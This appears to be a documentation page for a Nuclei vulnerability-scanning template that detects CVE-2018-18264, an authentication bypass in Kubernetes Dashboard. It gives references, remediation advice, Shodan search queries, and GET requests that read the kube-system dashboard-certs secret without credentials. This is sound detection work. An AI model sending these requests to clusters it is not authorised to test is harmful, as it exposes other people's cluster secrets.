Kubernetes Dashboard <1.10.1 - Authentication Bypass
ID: CVE-2018-18264
Severity: high
Author: edoardottt
Tags: cve,cve2018,kubernetes,k8s,auth-bypass
Description
Section titled “Description”Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard’s Service Account for reading secrets within the cluster.
YAML Source
Section titled “YAML Source”id: CVE-2018-18264
info: name: Kubernetes Dashboard <1.10.1 - Authentication Bypass author: edoardottt severity: high description: | Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. impact: | An attacker can bypass authentication and gain unauthorized access to the Kubernetes Dashboard, potentially leading to further compromise of the Kubernetes cluster. remediation: | Upgrade to Kubernetes Dashboard version 1.10.1 or later to mitigate the authentication bypass vulnerability. reference: - https://github.com/kubernetes/dashboard/pull/3289 - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/ - https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI - https://nvd.nist.gov/vuln/detail/CVE-2018-18264 - https://github.com/kubernetes/dashboard/pull/3400 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 epss-score: 0.95251 epss-percentile: 0.9934 cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kubernetes product: dashboard shodan-query: - product:"Kubernetes" - product:"kubernetes" tags: cve,cve2018,kubernetes,k8s,auth-bypass
http: - method: GET path: - "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" - "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
stop-at-first-match: true
matchers-condition: and matchers: - type: dsl dsl: - 'contains(body, "apiVersion") && contains(body, "objectRef")'
- type: status status: - 200# digest: 4b0a004830460221008420b7f46a9c180737a58dc27d2fe419cd68a20cfd78d316ef98b4e7d4012a0d022100cd1de9e5f99a089924dc012d4709d3ab3a36955e69be96d4c81588776fce6cbe:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-18264.yaml"